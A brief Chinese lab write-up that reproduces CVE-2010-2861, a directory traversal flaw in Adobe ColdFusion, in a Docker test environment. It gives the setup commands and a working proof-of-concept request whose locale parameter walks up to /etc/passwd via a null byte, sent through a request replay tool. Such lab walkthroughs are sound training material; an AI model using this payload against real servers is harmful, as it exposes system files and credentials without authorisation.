Adobe ColdFusion Directory Traffic漏洞（CVE-2010-2861

Adobe ColdFusion是由J.J.Allaire于1995年创建的商业快速Web应用程序开发计算平台。

Adobe ColdFusion 9.0.1及更早版本中存在一个目录遍历漏洞，远程攻击者可通过locale参数读取任意文件到

（1）CFIDE/administrator/settings/mappings.cfm

（2）logging/settings.cfm

（3）日志/index.cfm

（4）j2eepackaging/editarchive.cfm和

（5）在CFIDE/administrator/中输入.cfm

环境设置

执行以下命令以启动Adobe CouldFusion 8.0.1服务器：

docker compose up -d

服务器启动可能需要1~5分钟。之后，访问http://your-ip:8500/CFIDE/administrator/enter.cfm查看初始化页面，输入密码admin初始化整个服务器。

初始化后界面为

抓取当前路径下的包放到Repeater

放入重放器里，把/CFIDE/administrator后面修改为以下poc，并且需要把cookie删除

/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en

重发

成功读取

最后使用完靶场，记得关闭

docker-compose down